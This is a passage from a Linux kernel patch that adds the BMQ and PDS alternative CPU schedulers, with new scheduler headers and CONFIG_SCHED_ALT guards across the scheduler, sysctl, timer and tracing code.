++extern int sched_numa_find_closest(const struct cpumask *cpus, int cpu);
++#else
++static inline int sched_numa_find_closest(const struct cpumask *cpus, int cpu)
++{
++	return nr_cpu_ids;
++}
++#endif
++
++extern void swake_up_all_locked(struct swait_queue_head *q);
++extern void __prepare_to_swait(struct swait_queue_head *q, struct swait_queue *wait);
++
++#ifdef CONFIG_PREEMPT_DYNAMIC
++extern int preempt_dynamic_mode;
++extern int sched_dynamic_mode(const char *str);
++extern void sched_dynamic_update(int mode);
++#endif
++
++static inline void nohz_run_idle_balance(int cpu) { }
++
++static inline
++unsigned long uclamp_rq_util_with(struct rq *rq, unsigned long util,
++				  struct task_struct *p)
++{
++	return util;
++}
++
++static inline bool uclamp_rq_is_capped(struct rq *rq) { return false; }
++
++#endif /* ALT_SCHED_H */
+diff --git a/kernel/sched/bmq.h b/kernel/sched/bmq.h
+new file mode 100644
+index 000000000000..66b77291b9d0
+--- /dev/null
++++ b/kernel/sched/bmq.h
+@@ -0,0 +1,110 @@
++#define ALT_SCHED_VERSION_MSG "sched/bmq: BMQ CPU Scheduler "ALT_SCHED_VERSION" by Alfred Chen.\n"
++
++/*
++ * BMQ only routines
++ */
++#define rq_switch_time(rq)	((rq)->clock - (rq)->last_ts_switch)
++#define boost_threshold(p)	(sched_timeslice_ns >>\
++				 (15 - MAX_PRIORITY_ADJ -  (p)->boost_prio))
++
++static inline void boost_task(struct task_struct *p)
++{
++	int limit;
++
++	switch (p->policy) {
++	case SCHED_NORMAL:
++		limit = -MAX_PRIORITY_ADJ;
++		break;
++	case SCHED_BATCH:
++	case SCHED_IDLE:
++		limit = 0;
++		break;
++	default:
++		return;
++	}
++
++	if (p->boost_prio > limit)
++		p->boost_prio--;
++}
++
++static inline void deboost_task(struct task_struct *p)
++{
++	if (p->boost_prio < MAX_PRIORITY_ADJ)
++		p->boost_prio++;
++}
++
++/*
++ * Common interfaces
++ */
++static inline void sched_timeslice_imp(const int timeslice_ms) {}
++
++static inline int
++task_sched_prio_normal(const struct task_struct *p, const struct rq *rq)
++{
++	return p->prio + p->boost_prio - MAX_RT_PRIO;
++}
++
++static inline int task_sched_prio(const struct task_struct *p)
++{
++	return (p->prio < MAX_RT_PRIO)? p->prio : MAX_RT_PRIO / 2 + (p->prio + p->boost_prio) / 2;
++}
++
++static inline int
++task_sched_prio_idx(const struct task_struct *p, const struct rq *rq)
++{
++	return task_sched_prio(p);
++}
++
++static inline int sched_prio2idx(int prio, struct rq *rq)
++{
++	return prio;
++}
++
++static inline int sched_idx2prio(int idx, struct rq *rq)
++{
++	return idx;
++}
++
++static inline void time_slice_expired(struct task_struct *p, struct rq *rq)
++{
++	p->time_slice = sched_timeslice_ns;
++
++	if (SCHED_FIFO != p->policy && task_on_rq_queued(p)) {
++		if (SCHED_RR != p->policy)
++			deboost_task(p);
++		requeue_task(p, rq, task_sched_prio_idx(p, rq));
++	}
++}
++
++static inline void sched_task_sanity_check(struct task_struct *p, struct rq *rq) {}
++
++inline int task_running_nice(struct task_struct *p)
++{
++	return (p->prio + p->boost_prio > DEFAULT_PRIO + MAX_PRIORITY_ADJ);
++}
++
++static void sched_task_fork(struct task_struct *p, struct rq *rq)
++{
++	p->boost_prio = MAX_PRIORITY_ADJ;
++}
++
++static inline void do_sched_yield_type_1(struct task_struct *p, struct rq *rq)
++{
++	p->boost_prio = MAX_PRIORITY_ADJ;
++}
++
++#ifdef CONFIG_SMP
++static inline void sched_task_ttwu(struct task_struct *p)
++{
++	if(this_rq()->clock_task - p->last_ran > sched_timeslice_ns)
++		boost_task(p);
++}
++#endif
++
++static inline void sched_task_deactivate(struct task_struct *p, struct rq *rq)
++{
++	if (rq_switch_time(rq) < boost_threshold(p))
++		boost_task(p);
++}
++
++static inline void update_rq_time_edge(struct rq *rq) {}
+diff --git a/kernel/sched/build_policy.c b/kernel/sched/build_policy.c
+index d9dc9ab3773f..71a25540d65e 100644
+--- a/kernel/sched/build_policy.c
++++ b/kernel/sched/build_policy.c
+@@ -42,13 +42,19 @@
+
+ #include "idle.c"
+
++#ifndef CONFIG_SCHED_ALT
+ #include "rt.c"
++#endif
+
+ #ifdef CONFIG_SMP
++#ifndef CONFIG_SCHED_ALT
+ # include "cpudeadline.c"
++#endif
+ # include "pelt.c"
+ #endif
+
+ #include "cputime.c"
+-#include "deadline.c"
+
++#ifndef CONFIG_SCHED_ALT
++#include "deadline.c"
++#endif
+diff --git a/kernel/sched/build_utility.c b/kernel/sched/build_utility.c
+index 99bdd96f454f..23f80a86d2d7 100644
+--- a/kernel/sched/build_utility.c
++++ b/kernel/sched/build_utility.c
+@@ -85,7 +85,9 @@
+
+ #ifdef CONFIG_SMP
+ # include "cpupri.c"
++#ifndef CONFIG_SCHED_ALT
+ # include "stop_task.c"
++#endif
+ # include "topology.c"
+ #endif
+
+diff --git a/kernel/sched/cpufreq_schedutil.c b/kernel/sched/cpufreq_schedutil.c
+index 1207c78f85c1..68812e0756cb 100644
+--- a/kernel/sched/cpufreq_schedutil.c
++++ b/kernel/sched/cpufreq_schedutil.c
+@@ -159,9 +159,14 @@ static void sugov_get_util(struct sugov_cpu *sg_cpu)
+ 	struct rq *rq = cpu_rq(sg_cpu->cpu);
+
+ 	sg_cpu->max = arch_scale_cpu_capacity(sg_cpu->cpu);
++#ifndef CONFIG_SCHED_ALT
+ 	sg_cpu->bw_dl = cpu_bw_dl(rq);
+ 	sg_cpu->util = effective_cpu_util(sg_cpu->cpu, cpu_util_cfs(sg_cpu->cpu),
+ 					  FREQUENCY_UTIL, NULL);
++#else
++	sg_cpu->bw_dl = 0;
++	sg_cpu->util = rq_load_util(rq, sg_cpu->max);
++#endif /* CONFIG_SCHED_ALT */
+ }
+
+ /**
+@@ -305,8 +310,10 @@ static inline bool sugov_cpu_is_busy(struct sugov_cpu *sg_cpu) { return false; }
+  */
+ static inline void ignore_dl_rate_limit(struct sugov_cpu *sg_cpu)
+ {
++#ifndef CONFIG_SCHED_ALT
+ 	if (cpu_bw_dl(cpu_rq(sg_cpu->cpu)) > sg_cpu->bw_dl)
+ 		sg_cpu->sg_policy->limits_changed = true;
++#endif
+ }
+
+ static inline bool sugov_update_single_common(struct sugov_cpu *sg_cpu,
+@@ -606,6 +613,7 @@ static int sugov_kthread_create(struct sugov_policy *sg_policy)
+ 	}
+
+ 	ret = sched_setattr_nocheck(thread, &attr);
++
+ 	if (ret) {
+ 		kthread_stop(thread);
+ 		pr_warn("%s: failed to set SCHED_DEADLINE\n", __func__);
+@@ -838,7 +846,9 @@ cpufreq_governor_init(schedutil_gov);
+ #ifdef CONFIG_ENERGY_MODEL
+ static void rebuild_sd_workfn(struct work_struct *work)
+ {
++#ifndef CONFIG_SCHED_ALT
+ 	rebuild_sched_domains_energy();
++#endif /* CONFIG_SCHED_ALT */
+ }
+ static DECLARE_WORK(rebuild_sd_work, rebuild_sd_workfn);
+
+diff --git a/kernel/sched/cputime.c b/kernel/sched/cputime.c
+index 95fc77853743..b48b3f9ed47f 100644
+--- a/kernel/sched/cputime.c
++++ b/kernel/sched/cputime.c
+@@ -122,7 +122,7 @@ void account_user_time(struct task_struct *p, u64 cputime)
+ 	p->utime += cputime;
+ 	account_group_user_time(p, cputime);
+
+-	index = (task_nice(p) > 0) ? CPUTIME_NICE : CPUTIME_USER;
++	index = task_running_nice(p) ? CPUTIME_NICE : CPUTIME_USER;
+
+ 	/* Add user time to cpustat. */
+ 	task_group_account_field(p, index, cputime);
+@@ -146,7 +146,7 @@ void account_guest_time(struct task_struct *p, u64 cputime)
+ 	p->gtime += cputime;
+
+ 	/* Add guest time to cpustat. */
+-	if (task_nice(p) > 0) {
++	if (task_running_nice(p)) {
+ 		task_group_account_field(p, CPUTIME_NICE, cputime);
+ 		cpustat[CPUTIME_GUEST_NICE] += cputime;
+ 	} else {
+@@ -284,7 +284,7 @@ static inline u64 account_other_time(u64 max)
+ #ifdef CONFIG_64BIT
+ static inline u64 read_sum_exec_runtime(struct task_struct *t)
+ {
+-	return t->se.sum_exec_runtime;
++	return tsk_seruntime(t);
+ }
+ #else
+ static u64 read_sum_exec_runtime(struct task_struct *t)
+@@ -294,7 +294,7 @@ static u64 read_sum_exec_runtime(struct task_struct *t)
+ 	struct rq *rq;
+
+ 	rq = task_rq_lock(t, &rf);
+-	ns = t->se.sum_exec_runtime;
++	ns = tsk_seruntime(t);
+ 	task_rq_unlock(rq, t, &rf);
+
+ 	return ns;
+@@ -626,7 +626,7 @@ void cputime_adjust(struct task_cputime *curr, struct prev_cputime *prev,
+ void task_cputime_adjusted(struct task_struct *p, u64 *ut, u64 *st)
+ {
+ 	struct task_cputime cputime = {
+-		.sum_exec_runtime = p->se.sum_exec_runtime,
++		.sum_exec_runtime = tsk_seruntime(p),
+ 	};
+
+ 	if (task_cputime(p, &cputime.utime, &cputime.stime))
+diff --git a/kernel/sched/debug.c b/kernel/sched/debug.c
+index 1637b65ba07a..033c6deeb515 100644
+--- a/kernel/sched/debug.c
++++ b/kernel/sched/debug.c
+@@ -7,6 +7,7 @@
+  * Copyright(C) 2007, Red Hat, Inc., Ingo Molnar
+  */
+
++#ifndef CONFIG_SCHED_ALT
+ /*
+  * This allows printing both to /proc/sched_debug and
+  * to the console
+@@ -215,6 +216,7 @@ static const struct file_operations sched_scaling_fops = {
+ };
+
+ #endif /* SMP */
++#endif /* !CONFIG_SCHED_ALT */
+
+ #ifdef CONFIG_PREEMPT_DYNAMIC
+
+@@ -278,6 +280,7 @@ static const struct file_operations sched_dynamic_fops = {
+
+ #endif /* CONFIG_PREEMPT_DYNAMIC */
+
++#ifndef CONFIG_SCHED_ALT
+ __read_mostly bool sched_debug_verbose;
+
+ static const struct seq_operations sched_debug_sops;
+@@ -293,6 +296,7 @@ static const struct file_operations sched_debug_fops = {
+ 	.llseek		= seq_lseek,
+ 	.release	= seq_release,
+ };
++#endif /* !CONFIG_SCHED_ALT */
+
+ static struct dentry *debugfs_sched;
+
+@@ -302,12 +306,15 @@ static __init int sched_init_debug(void)
+
+ 	debugfs_sched = debugfs_create_dir("sched", NULL);
+
++#ifndef CONFIG_SCHED_ALT
+ 	debugfs_create_file("features", 0644, debugfs_sched, NULL, &sched_feat_fops);
+ 	debugfs_create_bool("verbose", 0644, debugfs_sched, &sched_debug_verbose);
++#endif /* !CONFIG_SCHED_ALT */
+ #ifdef CONFIG_PREEMPT_DYNAMIC
+ 	debugfs_create_file("preempt", 0644, debugfs_sched, NULL, &sched_dynamic_fops);
+ #endif
+
++#ifndef CONFIG_SCHED_ALT
+ 	debugfs_create_u32("latency_ns", 0644, debugfs_sched, &sysctl_sched_latency);
+ 	debugfs_create_u32("min_granularity_ns", 0644, debugfs_sched, &sysctl_sched_min_granularity);
+ 	debugfs_create_u32("idle_min_granularity_ns", 0644, debugfs_sched, &sysctl_sched_idle_min_granularity);
+@@ -337,11 +344,13 @@ static __init int sched_init_debug(void)
+ #endif
+
+ 	debugfs_create_file("debug", 0444, debugfs_sched, NULL, &sched_debug_fops);
++#endif /* !CONFIG_SCHED_ALT */
+
+ 	return 0;
+ }
+ late_initcall(sched_init_debug);
+
++#ifndef CONFIG_SCHED_ALT
+ #ifdef CONFIG_SMP
+
+ static cpumask_var_t		sd_sysctl_cpus;
+@@ -1068,6 +1077,7 @@ void proc_sched_set_task(struct task_struct *p)
+ 	memset(&p->stats, 0, sizeof(p->stats));
+ #endif
+ }
++#endif /* !CONFIG_SCHED_ALT */
+
+ void resched_latency_warn(int cpu, u64 latency)
+ {
+diff --git a/kernel/sched/idle.c b/kernel/sched/idle.c
+index f26ab2675f7d..480d4ad16d45 100644
+--- a/kernel/sched/idle.c
++++ b/kernel/sched/idle.c
+@@ -400,6 +400,7 @@ void cpu_startup_entry(enum cpuhp_state state)
+ 		do_idle();
+ }
+
++#ifndef CONFIG_SCHED_ALT
+ /*
+  * idle-task scheduling class.
+  */
+@@ -521,3 +522,4 @@ DEFINE_SCHED_CLASS(idle) = {
+ 	.switched_to		= switched_to_idle,
+ 	.update_curr		= update_curr_idle,
+ };
++#endif
+diff --git a/kernel/sched/pds.h b/kernel/sched/pds.h
+new file mode 100644
+index 000000000000..56a649d02e49
+--- /dev/null
++++ b/kernel/sched/pds.h
+@@ -0,0 +1,127 @@
++#define ALT_SCHED_VERSION_MSG "sched/pds: PDS CPU Scheduler "ALT_SCHED_VERSION" by Alfred Chen.\n"
++
++static int sched_timeslice_shift = 22;
++
++#define NORMAL_PRIO_MOD(x)	((x) & (NORMAL_PRIO_NUM - 1))
++
++/*
++ * Common interfaces
++ */
++static inline void sched_timeslice_imp(const int timeslice_ms)
++{
++	if (2 == timeslice_ms)
++		sched_timeslice_shift = 21;
++}
++
++static inline int
++task_sched_prio_normal(const struct task_struct *p, const struct rq *rq)
++{
++	s64 delta = p->deadline - rq->time_edge + NORMAL_PRIO_NUM - NICE_WIDTH;
++
++	if (WARN_ONCE(delta > NORMAL_PRIO_NUM - 1,
++		      "pds: task_sched_prio_normal() delta %lld\n", delta))
++		return NORMAL_PRIO_NUM - 1;
++
++	return (delta < 0) ? 0 : delta;
++}
++
++static inline int task_sched_prio(const struct task_struct *p)
++{
++	return (p->prio < MAX_RT_PRIO) ? p->prio :
++		MIN_NORMAL_PRIO + task_sched_prio_normal(p, task_rq(p));
++}
++
++static inline int
++task_sched_prio_idx(const struct task_struct *p, const struct rq *rq)
++{
++	return (p->prio < MAX_RT_PRIO) ? p->prio : MIN_NORMAL_PRIO +
++		NORMAL_PRIO_MOD(task_sched_prio_normal(p, rq) + rq->time_edge);
++}
++
++static inline int sched_prio2idx(int prio, struct rq *rq)
++{
++	return (IDLE_TASK_SCHED_PRIO == prio || prio < MAX_RT_PRIO) ? prio :
++		MIN_NORMAL_PRIO + NORMAL_PRIO_MOD((prio - MIN_NORMAL_PRIO) +
++						  rq->time_edge);
++}
++
++static inline int sched_idx2prio(int idx, struct rq *rq)
++{
++	return (idx < MAX_RT_PRIO) ? idx : MIN_NORMAL_PRIO +
++		NORMAL_PRIO_MOD((idx - MIN_NORMAL_PRIO) + NORMAL_PRIO_NUM -
++				NORMAL_PRIO_MOD(rq->time_edge));
++}
++
++static inline void sched_renew_deadline(struct task_struct *p, const struct rq *rq)
++{
++	if (p->prio >= MAX_RT_PRIO)
++		p->deadline = (rq->clock >> sched_timeslice_shift) +
++			p->static_prio - (MAX_PRIO - NICE_WIDTH);
++}
++
++int task_running_nice(struct task_struct *p)
++{
++	return (p->prio > DEFAULT_PRIO);
++}
++
++static inline void update_rq_time_edge(struct rq *rq)
++{
++	struct list_head head;
++	u64 old = rq->time_edge;
++	u64 now = rq->clock >> sched_timeslice_shift;
++	u64 prio, delta;
++
++	if (now == old)
++		return;
++
++	delta = min_t(u64, NORMAL_PRIO_NUM, now - old);
++	INIT_LIST_HEAD(&head);
++
++	for_each_set_bit(prio, &rq->queue.bitmap[2], delta)
++		list_splice_tail_init(rq->queue.heads + MIN_NORMAL_PRIO +
++				      NORMAL_PRIO_MOD(prio + old), &head);
++
++	rq->queue.bitmap[2] = (NORMAL_PRIO_NUM == delta) ? 0UL :
++		rq->queue.bitmap[2] >> delta;
++	rq->time_edge = now;
++	if (!list_empty(&head)) {
++		u64 idx = MIN_NORMAL_PRIO + NORMAL_PRIO_MOD(now);
++		struct task_struct *p;
++
++		list_for_each_entry(p, &head, sq_node)
++			p->sq_idx = idx;
++
++		list_splice(&head, rq->queue.heads + idx);
++		rq->queue.bitmap[2] |= 1UL;
++	}
++}
++
++static inline void time_slice_expired(struct task_struct *p, struct rq *rq)
++{
++	p->time_slice = sched_timeslice_ns;
++	sched_renew_deadline(p, rq);
++	if (SCHED_FIFO != p->policy && task_on_rq_queued(p))
++		requeue_task(p, rq, task_sched_prio_idx(p, rq));
++}
++
++static inline void sched_task_sanity_check(struct task_struct *p, struct rq *rq)
++{
++	u64 max_dl = rq->time_edge + NICE_WIDTH - 1;
++	if (unlikely(p->deadline > max_dl))
++		p->deadline = max_dl;
++}
++
++static void sched_task_fork(struct task_struct *p, struct rq *rq)
++{
++	sched_renew_deadline(p, rq);
++}
++
++static inline void do_sched_yield_type_1(struct task_struct *p, struct rq *rq)
++{
++	time_slice_expired(p, rq);
++}
++
++#ifdef CONFIG_SMP
++static inline void sched_task_ttwu(struct task_struct *p) {}
++#endif
++static inline void sched_task_deactivate(struct task_struct *p, struct rq *rq) {}
+diff --git a/kernel/sched/pelt.c b/kernel/sched/pelt.c
+index 0f310768260c..bd38bf738fe9 100644
+--- a/kernel/sched/pelt.c
++++ b/kernel/sched/pelt.c
+@@ -266,6 +266,7 @@ ___update_load_avg(struct sched_avg *sa, unsigned long load)
+ 	WRITE_ONCE(sa->util_avg, sa->util_sum / divider);
+ }
+
++#ifndef CONFIG_SCHED_ALT
+ /*
+  * sched_entity:
+  *
+@@ -383,8 +384,9 @@ int update_dl_rq_load_avg(u64 now, struct rq *rq, int running)
+
+ 	return 0;
+ }
++#endif
+
+-#ifdef CONFIG_SCHED_THERMAL_PRESSURE
++#if defined(CONFIG_SCHED_THERMAL_PRESSURE) && !defined(CONFIG_SCHED_ALT)
+ /*
+  * thermal:
+  *
+diff --git a/kernel/sched/pelt.h b/kernel/sched/pelt.h
+index 3a0e0dc28721..e8a7d84aa5a5 100644
+--- a/kernel/sched/pelt.h
++++ b/kernel/sched/pelt.h
+@@ -1,13 +1,15 @@
+ #ifdef CONFIG_SMP
+ #include "sched-pelt.h"
+
++#ifndef CONFIG_SCHED_ALT
+ int __update_load_avg_blocked_se(u64 now, struct sched_entity *se);
+ int __update_load_avg_se(u64 now, struct cfs_rq *cfs_rq, struct sched_entity *se);
+ int __update_load_avg_cfs_rq(u64 now, struct cfs_rq *cfs_rq);
+ int update_rt_rq_load_avg(u64 now, struct rq *rq, int running);
+ int update_dl_rq_load_avg(u64 now, struct rq *rq, int running);
++#endif
+
+-#ifdef CONFIG_SCHED_THERMAL_PRESSURE
++#if defined(CONFIG_SCHED_THERMAL_PRESSURE) && !defined(CONFIG_SCHED_ALT)
+ int update_thermal_load_avg(u64 now, struct rq *rq, u64 capacity);
+
+ static inline u64 thermal_load_avg(struct rq *rq)
+@@ -44,6 +46,7 @@ static inline u32 get_pelt_divider(struct sched_avg *avg)
+ 	return PELT_MIN_DIVIDER + avg->period_contrib;
+ }
+
++#ifndef CONFIG_SCHED_ALT
+ static inline void cfs_se_util_change(struct sched_avg *avg)
+ {
+ 	unsigned int enqueued;
+@@ -180,9 +183,11 @@ static inline u64 cfs_rq_clock_pelt(struct cfs_rq *cfs_rq)
+ 	return rq_clock_pelt(rq_of(cfs_rq));
+ }
+ #endif
++#endif /* CONFIG_SCHED_ALT */
+
+ #else
+
++#ifndef CONFIG_SCHED_ALT
+ static inline int
+ update_cfs_rq_load_avg(u64 now, struct cfs_rq *cfs_rq)
+ {
+@@ -200,6 +205,7 @@ update_dl_rq_load_avg(u64 now, struct rq *rq, int running)
+ {
+ 	return 0;
+ }
++#endif
+
+ static inline int
+ update_thermal_load_avg(u64 now, struct rq *rq, u64 capacity)
+diff --git a/kernel/sched/sched.h b/kernel/sched/sched.h
+index a4a20046e586..c363693cd869 100644
+--- a/kernel/sched/sched.h
++++ b/kernel/sched/sched.h
+@@ -5,6 +5,10 @@
+ #ifndef _KERNEL_SCHED_SCHED_H
+ #define _KERNEL_SCHED_SCHED_H
+
++#ifdef CONFIG_SCHED_ALT
++#include "alt_sched.h"
++#else
++
+ #include <linux/sched/affinity.h>
+ #include <linux/sched/autogroup.h>
+ #include <linux/sched/cpufreq.h>
+@@ -3183,4 +3187,9 @@ static inline void update_current_exec_runtime(struct task_struct *curr,
+ 	cgroup_account_cputime(curr, delta_exec);
+ }
+
++static inline int task_running_nice(struct task_struct *p)
++{
++	return (task_nice(p) > 0);
++}
++#endif /* !CONFIG_SCHED_ALT */
+ #endif /* _KERNEL_SCHED_SCHED_H */
+diff --git a/kernel/sched/stats.c b/kernel/sched/stats.c
+index 857f837f52cb..5486c63e4790 100644
+--- a/kernel/sched/stats.c
++++ b/kernel/sched/stats.c
+@@ -125,8 +125,10 @@ static int show_schedstat(struct seq_file *seq, void *v)
+ 	} else {
+ 		struct rq *rq;
+ #ifdef CONFIG_SMP
++#ifndef CONFIG_SCHED_ALT
+ 		struct sched_domain *sd;
+ 		int dcount = 0;
++#endif
+ #endif
+ 		cpu = (unsigned long)(v - 2);
+ 		rq = cpu_rq(cpu);
+@@ -143,6 +145,7 @@ static int show_schedstat(struct seq_file *seq, void *v)
+ 		seq_printf(seq, "\n");
+
+ #ifdef CONFIG_SMP
++#ifndef CONFIG_SCHED_ALT
+ 		/* domain-specific stats */
+ 		rcu_read_lock();
+ 		for_each_domain(cpu, sd) {
+@@ -171,6 +174,7 @@ static int show_schedstat(struct seq_file *seq, void *v)
+ 			    sd->ttwu_move_balance);
+ 		}
+ 		rcu_read_unlock();
++#endif
+ #endif
+ 	}
+ 	return 0;
+diff --git a/kernel/sched/stats.h b/kernel/sched/stats.h
+index 84a188913cc9..53934e7ef5db 100644
+--- a/kernel/sched/stats.h
++++ b/kernel/sched/stats.h
+@@ -89,6 +89,7 @@ static inline void rq_sched_info_depart  (struct rq *rq, unsigned long long delt
+
+ #endif /* CONFIG_SCHEDSTATS */
+
++#ifndef CONFIG_SCHED_ALT
+ #ifdef CONFIG_FAIR_GROUP_SCHED
+ struct sched_entity_stats {
+ 	struct sched_entity     se;
+@@ -105,6 +106,7 @@ __schedstats_from_se(struct sched_entity *se)
+ #endif
+ 	return &task_of(se)->stats;
+ }
++#endif /* CONFIG_SCHED_ALT */
+
+ #ifdef CONFIG_PSI
+ void psi_task_change(struct task_struct *task, int clear, int set);
+diff --git a/kernel/sched/topology.c b/kernel/sched/topology.c
+index 8739c2a5a54e..d8dd6c15eb47 100644
+--- a/kernel/sched/topology.c
++++ b/kernel/sched/topology.c
+@@ -3,6 +3,7 @@
+  * Scheduler topology setup/handling methods
+  */
+
++#ifndef CONFIG_SCHED_ALT
+ DEFINE_MUTEX(sched_domains_mutex);
+
+ /* Protected by sched_domains_mutex: */
+@@ -1413,8 +1414,10 @@ static void asym_cpu_capacity_scan(void)
+  */
+
+ static int default_relax_domain_level = -1;
++#endif /* CONFIG_SCHED_ALT */
+ int sched_domain_level_max;
+
++#ifndef CONFIG_SCHED_ALT
+ static int __init setup_relax_domain_level(char *str)
+ {
+ 	if (kstrtoint(str, 0, &default_relax_domain_level))
+@@ -1647,6 +1650,7 @@ sd_init(struct sched_domain_topology_level *tl,
+
+ 	return sd;
+ }
++#endif /* CONFIG_SCHED_ALT */
+
+ /*
+  * Topology list, bottom-up.
+@@ -1683,6 +1687,7 @@ void set_sched_topology(struct sched_domain_topology_level *tl)
+ 	sched_domain_topology_saved = NULL;
+ }
+
++#ifndef CONFIG_SCHED_ALT
+ #ifdef CONFIG_NUMA
+
+ static const struct cpumask *sd_numa_mask(int cpu)
+@@ -2645,3 +2650,15 @@ void partition_sched_domains(int ndoms_new, cpumask_var_t doms_new[],
+ 	partition_sched_domains_locked(ndoms_new, doms_new, dattr_new);
+ 	mutex_unlock(&sched_domains_mutex);
+ }
++#else /* CONFIG_SCHED_ALT */
++void partition_sched_domains(int ndoms_new, cpumask_var_t doms_new[],
++			     struct sched_domain_attr *dattr_new)
++{}
++
++#ifdef CONFIG_NUMA
++int sched_numa_find_closest(const struct cpumask *cpus, int cpu)
++{
++	return best_mask_cpu(cpu, cpus);
++}
++#endif /* CONFIG_NUMA */
++#endif
+diff --git a/kernel/sysctl.c b/kernel/sysctl.c
+index c6d9dec11b74..2bc42ce8b48e 100644
+--- a/kernel/sysctl.c
++++ b/kernel/sysctl.c
+@@ -93,6 +93,10 @@ EXPORT_SYMBOL_GPL(sysctl_long_vals);
+
+ /* Constants used for minimum and maximum */
+
++#ifdef CONFIG_SCHED_ALT
++extern int sched_yield_type;
++#endif
++
+ #ifdef CONFIG_PERF_EVENTS
+ static const int six_hundred_forty_kb = 640 * 1024;
+ #endif
+@@ -1633,6 +1637,7 @@ int proc_do_static_key(struct ctl_table *table, int write,
+ }
+
+ static struct ctl_table kern_table[] = {
++#ifndef CONFIG_SCHED_ALT
+ #ifdef CONFIG_NUMA_BALANCING
+ 	{
+ 		.procname	= "numa_balancing",
+@@ -1652,6 +1657,7 @@ static struct ctl_table kern_table[] = {
+ 		.extra1		= SYSCTL_ZERO,
+ 	},
+ #endif /* CONFIG_NUMA_BALANCING */
++#endif /* !CONFIG_SCHED_ALT */
+ 	{
+ 		.procname	= "panic",
+ 		.data		= &panic_timeout,
+@@ -1953,6 +1959,17 @@ static struct ctl_table kern_table[] = {
+ 		.proc_handler	= proc_dointvec,
+ 	},
+ #endif
++#ifdef CONFIG_SCHED_ALT
++	{
++		.procname	= "yield_type",
++		.data		= &sched_yield_type,
++		.maxlen		= sizeof (int),
++		.mode		= 0644,
++		.proc_handler	= &proc_dointvec_minmax,
++		.extra1		= SYSCTL_ZERO,
++		.extra2		= SYSCTL_TWO,
++	},
++#endif
+ #if defined(CONFIG_S390) && defined(CONFIG_SMP)
+ 	{
+ 		.procname	= "spin_retry",
+diff --git a/kernel/time/hrtimer.c b/kernel/time/hrtimer.c
+index 3ae661ab6260..35f0176dcdb0 100644
+--- a/kernel/time/hrtimer.c
++++ b/kernel/time/hrtimer.c
+@@ -2088,8 +2088,10 @@ long hrtimer_nanosleep(ktime_t rqtp, const enum hrtimer_mode mode,
+ 	int ret = 0;
+ 	u64 slack;
+
++#ifndef CONFIG_SCHED_ALT
+ 	slack = current->timer_slack_ns;
+ 	if (dl_task(current) || rt_task(current))
++#endif
+ 		slack = 0;
+
+ 	hrtimer_init_sleeper_on_stack(&t, clockid, mode);
+diff --git a/kernel/time/posix-cpu-timers.c b/kernel/time/posix-cpu-timers.c
+index cb925e8ef9a8..67d823510f5c 100644
+--- a/kernel/time/posix-cpu-timers.c
++++ b/kernel/time/posix-cpu-timers.c
+@@ -223,7 +223,7 @@ static void task_sample_cputime(struct task_struct *p, u64 *samples)
+ 	u64 stime, utime;
+
+ 	task_cputime(p, &utime, &stime);
+-	store_samples(samples, stime, utime, p->se.sum_exec_runtime);
++	store_samples(samples, stime, utime, tsk_seruntime(p));
+ }
+
+ static void proc_sample_cputime_atomic(struct task_cputime_atomic *at,
+@@ -866,6 +866,7 @@ static void collect_posix_cputimers(struct posix_cputimers *pct, u64 *samples,
+ 	}
+ }
+
++#ifndef CONFIG_SCHED_ALT
+ static inline void check_dl_overrun(struct task_struct *tsk)
+ {
+ 	if (tsk->dl.dl_overrun) {
+@@ -873,6 +874,7 @@ static inline void check_dl_overrun(struct task_struct *tsk)
+ 		send_signal_locked(SIGXCPU, SEND_SIG_PRIV, tsk, PIDTYPE_TGID);
+ 	}
+ }
++#endif
+
+ static bool check_rlimit(u64 time, u64 limit, int signo, bool rt, bool hard)
+ {
+@@ -900,8 +902,10 @@ static void check_thread_timers(struct task_struct *tsk,
+ 	u64 samples[CPUCLOCK_MAX];
+ 	unsigned long soft;
+
++#ifndef CONFIG_SCHED_ALT
+ 	if (dl_task(tsk))
+ 		check_dl_overrun(tsk);
++#endif
+
+ 	if (expiry_cache_is_inactive(pct))
+ 		return;
+@@ -915,7 +919,7 @@ static void check_thread_timers(struct task_struct *tsk,
+ 	soft = task_rlimit(tsk, RLIMIT_RTTIME);
+ 	if (soft != RLIM_INFINITY) {
+ 		/* Task RT timeout is accounted in jiffies. RTTIME is usec */
+-		unsigned long rttime = tsk->rt.timeout * (USEC_PER_SEC / HZ);
++		unsigned long rttime = tsk_rttimeout(tsk) * (USEC_PER_SEC / HZ);
+ 		unsigned long hard = task_rlimit_max(tsk, RLIMIT_RTTIME);
+
+ 		/* At the hard limit, send SIGKILL. No further action. */
+@@ -1151,8 +1155,10 @@ static inline bool fastpath_timer_check(struct task_struct *tsk)
+ 			return true;
+ 	}
+
++#ifndef CONFIG_SCHED_ALT
+ 	if (dl_task(tsk) && tsk->dl.dl_overrun)
+ 		return true;
++#endif
+
+ 	return false;
+ }
+diff --git a/kernel/trace/trace_selftest.c b/kernel/trace/trace_selftest.c
+index a2d301f58ced..2ccdede8585c 100644
+--- a/kernel/trace/trace_selftest.c
++++ b/kernel/trace/trace_selftest.c
+@@ -1143,10 +1143,15 @@ static int trace_wakeup_test_thread(void *data)
+ {
+ 	/* Make this a -deadline thread */
+ 	static const struct sched_attr attr = {
++#ifdef CONFIG_SCHED_ALT
++		/* No deadline on BMQ/PDS, use RR */
++		.sched_policy = SCHED_RR,
++#else
+ 		.sched_policy = SCHED_DEADLINE,
+ 		.sched_runtime = 100000ULL,
+ 		.sched_deadline = 10000000ULL,
+ 		.sched_period = 10000000ULL
++#endif
+ 	};
+ 	struct wakeup_test_data *x = data;
+
+diff --git a/kernel/sched/alt_core.c b/kernel/sched/alt_core.c
+index 03772805e4f9f1bf881740c8dd14aef667fbecf2..4742bbdfb2d715a439c0d505b4f293a82b76b255 100644
+--- a/kernel/sched/alt_core.c
++++ b/kernel/sched/alt_core.c
+@@ -5661,9 +5661,6 @@ static int __sched_setscheduler(struct task_struct *p,
+ 			return retval;
+ 	}
+
+-	if (pi)
+-		cpuset_read_lock();
+-
+ 	/*
+ 	 * Make sure no PI-waiters arrive (or leave) while we are
+ 	 * changing the priority of the task:
+@@ -5709,8 +5706,6 @@ static int __sched_setscheduler(struct task_struct *p,
+ 		policy = oldpolicy = -1;
+ 		__task_access_unlock(p, lock);
+ 		raw_spin_unlock_irqrestore(&p->pi_lock, flags);
+-		if (pi)
+-			cpuset_read_unlock();
+ 		goto recheck;
+ 	}
+
+@@ -5741,10 +5736,8 @@ static int __sched_setscheduler(struct task_struct *p,
+ 	__task_access_unlock(p, lock);
